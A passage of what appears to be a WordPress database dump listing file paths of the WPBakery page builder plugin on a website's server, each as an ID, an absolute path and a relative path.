','wp-content/plugins/js_composer/config/lean-map.php'),(1239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/social/shortcode-vc-facebook.php','wp-content/plugins/js_composer/config/social/shortcode-vc-facebook.php'),(1240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/social/shortcode-vc-pinterest.php','wp-content/plugins/js_composer/config/social/shortcode-vc-pinterest.php'),(1241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/social/shortcode-vc-tweetmeme.php','wp-content/plugins/js_composer/config/social/shortcode-vc-tweetmeme.php'),(1242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-html.php','wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-html.php'),(1243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-js.php','wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-js.php'),(1244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/structure/shortcode-vc-widget-sidebar.php','wp-content/plugins/js_composer/config/structure/shortcode-vc-widget-sidebar.php'),(1245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/templates.php','wp-content/plugins/js_composer/config/templates.php'),(1246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-accordion.php','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-accordion.php'),(1247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-pageable.php','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-pageable.php'),(1248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-section.php','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-section.php'),(1249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tabs.php','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tabs.php'),(1250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tour.php','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tour.php'),(1251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-archives.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-archives.php'),(1252,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-calendar.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-calendar.php'),(1253,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-categories.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-categories.php'),(1254,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-custommenu.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-custommenu.php'),(1255,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-links.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-links.php'),(1256,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-meta.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-meta.php'),(1257,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-pages.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-pages.php'),(1258,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-posts.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-posts.php'),(1259,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-recentcomments.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-recentcomments.php'),(1260,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-rss.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-rss.php'),(1261,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-search.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-search.php'),(1262,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-tagcloud.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-tagcloud.php'),(1263,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-text.php','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-text.php'),(1264,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/bc-access-rules-4.8.php','wp-content/plugins/js_composer/include/autoload/bc-access-rules-4.8.php'),(1265,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/bc-multisite-options.php','wp-content/plugins/js_composer/include/autoload/bc-multisite-options.php'),(1266,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/class-vc-settings-presets.php','wp-content/plugins/js_composer/include/autoload/class-vc-settings-presets.php'),(1267,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/class-vc-vendor-presets.php','wp-content/plugins/js_composer/include/autoload/class-vc-vendor-presets.php'),(1268,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/hook-vc-grid.php','wp-content/plugins/js_composer/include/autoload/hook-vc-grid.php'),(1269,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/hook-vc-iconpicker-param.php','wp-content/plugins/js_composer/include/autoload/hook-vc-iconpicker-param.php'),(1270,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/hook-vc-message.php','wp-content/plugins/js_composer/include/autoload/hook-vc-message.php'),(1271,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/hook-vc-pie.php','wp-content/plugins/js_composer/include/autoload/hook-vc-pie.php'),(1272,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/hook-vc-progress-bar.php','wp-content/plugins/js_composer/include/autoload/hook-vc-progress-bar.php'),(1273,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/hook-vc-wp-text.php','wp-content/plugins/js_composer/include/autoload/hook-vc-wp-text.php'),(1274,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/params/hidden.php','wp-content/plugins/js_composer/include/autoload/params/hidden.php'),(1275,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/params/vc_grid_item.php','wp-content/plugins/js_composer/include/autoload/params/vc_grid_item.php'),(1276,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/params-to-init.php','wp-content/plugins/js_composer/include/autoload/params-to-init.php'),(1277,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/post-type-default-template.php','wp-content/plugins/js_composer/include/autoload/post-type-default-template.php'),(1278,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/ui-vc-pointers.php','wp-content/plugins/js_composer/include/autoload/ui-vc-pointers.php'),(1279,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-grid-item-editor.php','wp-content/plugins/js_composer/include/autoload/vc-grid-item-editor.php'),(1280,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-image-filters.php','wp-content/plugins/js_composer/include/autoload/vc-image-filters.php'),(1281,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pages/automapper.php','wp-content/plugins/js_composer/include/autoload/vc-pages/automapper.php'),(1282,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pages/page-custom-css.php','wp-content/plugins/js_composer/include/autoload/vc-pages/page-custom-css.php'),(1283,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pages/page-design-options.php','wp-content/plugins/js_composer/include/autoload/vc-pages/page-design-options.php'),(1284,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pages/page-role-manager.php','wp-content/plugins/js_composer/include/autoload/vc-pages/page-role-manager.php'),(1285,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pages/pages.php','wp-content/plugins/js_composer/include/autoload/vc-pages/pages.php'),(1286,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pages/settings-tabs.php','wp-content/plugins/js_composer/include/autoload/vc-pages/settings-tabs.php'),(1287,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pages/welcome-screen.php','wp-content/plugins/js_composer/include/autoload/vc-pages/welcome-screen.php'),(1288,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pointers-backend-editor.php','wp-content/plugins/js_composer/include/autoload/vc-pointers-backend-editor.php'),(1289,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pointers-frontend-editor.php','wp-content/plugins/js_composer/include/autoload/vc-pointers-frontend-editor.php'),(1290,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-settings-presets.php','wp-content/plugins/js_composer/include/autoload/vc-settings-presets.php'),(1291,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-shortcode-autoloader.php','wp-content/plugins/js_composer/include/autoload/vc-shortcode-autoloader.php'),(1292,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-single-image.php','wp-content/plugins/js_composer/include/autoload/vc-single-image.php'),(1293,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-undoredo.php','wp-content/plugins/js_composer/include/autoload/vc-undoredo.php'),(1294,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/acf.php','wp-content/plugins/js_composer/include/autoload/vendors/acf.php'),(1295,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/cf7.php','wp-content/plugins/js_composer/include/autoload/vendors/cf7.php'),(1296,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/gravity_forms.php','wp-content/plugins/js_composer/include/autoload/vendors/gravity_forms.php'),(1297,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/gutenberg.php','wp-content/plugins/js_composer/include/autoload/vendors/gutenberg.php'),(1298,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/jwplayer.php','wp-content/plugins/js_composer/include/autoload/vendors/jwplayer.php'),(1299,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/layerslider.php','wp-content/plugins/js_composer/include/autoload/vendors/layerslider.php'),(1300,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/mqtranslate.php','wp-content/plugins/js_composer/include/autoload/vendors/mqtranslate.php'),(1301,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/ninja_forms.php','wp-content/plugins/js_composer/include/autoload/vendors/ninja_forms.php'),(1302,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/qtranslate-x.php','wp-content/plugins/js_composer/include/autoload/vendors/qtranslate-x.php'),(1303,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/qtranslate.php','wp-content/plugins/js_composer/include/autoload/vendors/qtranslate.php'),(1304,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/revslider.php','wp-content/plugins/js_composer/include/autoload/vendors/revslider.php'),(1305,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/shortcode-vc-gutenberg.php','wp-content/plugins/js_composer/include/autoload/vendors/shortcode-vc-gutenberg.php'),(1306,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/woocommerce.php','wp-content/plugins/js_composer/include/autoload/vendors/woocommerce.php'),(1307,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/wpml.php','wp-content/plugins/js_composer/include/autoload/vendors/wpml.php'),(1308,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vendors/yoast_seo.php','wp-content/plugins/js_composer/include/autoload/vendors/yoast_seo.php'),(1309,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/access/abstract-class-vc-access.php','wp-content/plugins/js_composer/include/classes/core/access/abstract-class-vc-access.php'),(1310,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/access/class-vc-current-user-access-controller.php','wp-content/plugins/js_composer/include/classes/core/access/class-vc-current-user-access-controller.php'),(1311,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/access/class-vc-current-user-access.php','wp-content/plugins/js_composer/include/classes/core/access/class-vc-current-user-access.php'),(1312,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/access/class-vc-role-access-controller.php','wp-content/plugins/js_composer/include/classes/core/access/class-vc-role-access-controller.php'),(1313,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/access/class-vc-role-access.php','wp-content/plugins/js_composer/include/classes/core/access/class-vc-role-access.php'),(1314,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-base.php','wp-content/plugins/js_composer/include/classes/core/class-vc-base.php'),(1315,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-manager.php','wp-content/plugins/js_composer/include/classes/core/class-vc-manager.php'),(1316,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-mapper.php','wp-content/plugins/js_composer/include/classes/core/class-vc-mapper.php'),(1317,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-modifications.php','wp-content/plugins/js_composer/include/classes/core/class-vc-modifications.php'),(1318,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-page.php','wp-content/plugins/js_composer/include/classes/core/class-vc-page.php'),(1319,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-pages-group.php','wp-content/plugins/js_composer/include/classes/core/class-vc-pages-group.php'),(1320,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-post-admin.php','wp-content/plugins/js_composer/include/classes/core/class-vc-post-admin.php'),(1321,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-shared-library.php','wp-content/plugins/js_composer/include/classes/core/class-vc-shared-library.php'),(1322,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-vc-sort.php','wp-content/plugins/js_composer/include/classes/core/class-vc-sort.php'),(1323,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/class-wpb-map.php','wp-content/plugins/js_composer/include/classes/core/class-wpb-map.php'),(1324,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/shared-templates/class-vc-shared-templates.php','wp-content/plugins/js_composer/include/classes/core/shared-templates/class-vc-shared-templates.php'),(1325,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wp-import.php','wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wp-import.php'),(1326,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-plugin.php','wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-plugin.php'),(1327,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-regex.php','wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-regex.php'),(1328,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-simplexml.php','wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-simplexml.php'),(1329,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-xml.php','wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-xml.php'),(1330,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser.php','wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser.php'),(1331,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/deprecated/helpers_deprecated.php','wp-content/plugins/js_composer/include/classes/deprecated/helpers_deprecated.php'),(1332,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/deprecated/interfaces.php','wp-content/plugins/js_composer/include/classes/deprecated/interfaces.php'),(1333,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/class-vc-backend-editor.php','wp-content/plugins/js_composer/include/classes/editors/class-vc-backend-editor.php'),(1334,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/class-vc-edit-form-fields.php','wp-content/plugins/js_composer/include/classes/editors/class-vc-edit-form-fields.php'),(1335,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/class-vc-frontend-editor.php','wp-content/plugins/js_composer/include/classes/editors/class-vc-frontend-editor.php'),(1336,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar-frontend.php','wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar-frontend.php'),(1337,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar-undoredo.php','wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar-undoredo.php'),(1338,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar.php','wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar.php'),(1339,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-add-element-box.php','wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-add-element-box.php'),(1340,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-edit-layout.php','wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-edit-layout.php'),(1341,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-post-settings.php','wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-post-settings.php'),(1342,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-preset-panel-editor.php','wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-preset-panel-editor.php'),(1343,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-shortcode-edit-form.php','wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-shortcode-edit-form.php'),(1344,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-templates-panel-editor.php','wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-templates-panel-editor.php'),(1345,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/settings/automapper/automapper.php','wp-content/plugins/js_composer/include/classes/settings/automapper/automapper.php'),(1346,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/settings/automapper/class-vc-automap-model.php','wp-content/plugins/js_composer/include/classes/settings/automapper/class-vc-automap-model.php'),(1347,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/settings/automapper/class-vc-automapper.php','wp-content/plugins/js_composer/include/classes/settings/automapper/class-vc-automapper.php'),(1348,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/settings/class-vc-license.php','wp-content/plugins/js_composer/include/classes/settings/class-vc-license.php'),(1349,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/settings/class-vc-roles.php','wp-content/plugins/js_composer/include/classes/settings/class-vc-roles.php'),(1350,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/settings/class-vc-settings.php','wp-content/plugins/js_composer/include/classes/settings/class-vc-settings.php'),(1351,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/core/class-vc-shortcodes-manager.php','wp-content/plugins/js_composer/include/classes/shortcodes/core/class-vc-shortcodes-manager.php'),(1352,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wbpakeryshortcodefishbones.php','wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wbpakeryshortcodefishbones.php'),(1353,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakery-visualcomposer-abstract.php','wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakery-visualcomposer-abstract.php'),(1354,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakeryshortcode.php','wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakeryshortcode.php'),(1355,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakeryshortcodescontainer.php','wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakeryshortcodescontainer.php'),(1356,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/layerslider-vc.php','wp-content/plugins/js_composer/include/classes/shortcodes/layerslider-vc.php'),(1357,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/paginator/class-vc-pageable.php','wp-content/plugins/js_composer/include/classes/shortcodes/paginator/class-vc-pageable.php'),(1358,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/rev-slider-vc.php','wp-content/plugins/js_composer/include/classes/shortcodes/rev-slider-vc.php'),(1359,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-accordion-tab.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-accordion-tab.php'),(1360,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-accordion.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-accordion.php'),(1361,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-basic-grid.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-basic-grid.php'),(1362,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-btn.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-btn.php'),(1363,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-button.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-button.php'),(1364,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-button2.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-button2.php'),(1365,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-column-inner.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-column-inner.php'),(1366,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-column-text.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-column-text.php'),(1367,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-column.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-column.php'),(1368,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta-button.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta-button.php'),(1369,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta-button2.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta-button2.php'),(1370,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta.php'),(1371,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-custom-field.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-custom-field.php'),(1372,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-custom-heading.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-custom-heading.php'),(1373,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-empty-space.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-empty-space.php'),(1374,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-facebook.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-facebook.php'),(1375,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-flickr.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-flickr.php'),(1376,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gallery.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gallery.php'),(1377,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-animated-block.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-animated-block.php'),(1378,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-col.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-col.php'),(1379,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-image.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-image.php'),(1380,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-author.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-author.php'),(1381,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-categories.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-categories.php'),(1382,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-data.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-data.php'),(1383,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-date.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-date.php'),(1384,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-excerpt.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-excerpt.php'),(1385,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-meta.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-meta.php'),(1386,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-title.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-title.php'),(1387,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-row.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-row.php'),(1388,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-a.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-a.php'),(1389,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-b.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-b.php'),(1390,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-c.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-c.php'),(1391,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone.php'),(1392,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem.php'),(1393,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gmaps.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-gmaps.php'),(1394,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-googleplus.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-googleplus.php'),(1395,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-gutenberg.php','wp-content/plugins/js_composer/include/c